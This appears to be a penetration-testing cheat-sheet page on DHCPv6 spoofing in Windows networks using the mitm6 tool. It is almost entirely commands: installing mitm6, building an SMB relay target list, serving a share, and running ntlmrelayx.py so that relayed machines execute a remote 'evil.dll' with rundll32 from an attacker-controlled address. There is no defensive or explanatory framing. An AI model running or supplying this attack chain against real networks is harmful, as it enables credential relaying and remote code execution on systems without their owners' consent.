DHCPv6 Spoofing
Dynamic Host Configuration Protocol version 6
mitm6
$ git clone https://github.com/fox-it/mitm6 ~/tools/mitm6 && cd ~/tools/mitm6
$ python3 setup.py install
Or
$ pipx install -f "git+https://github.com/fox-it/mitm6.git"$ cme smb 192.168.1.0/24 --gen-relay-list relay.txt$ smbserver.py -smb2support share `pwd` | tee -a ~/ws/log/mitm6-smbserver.out$ ntlmrelayx.py -6 -tf relay.txt -wh attacker-wpad -c 'cmd /c C:\Windows\System32\rundll32.exe \\10.10.13.37\share\evil.dll, SVywATCKorN' --no-smb-server --no-wcf-server --no-raw-serverAttack vectors
Last updated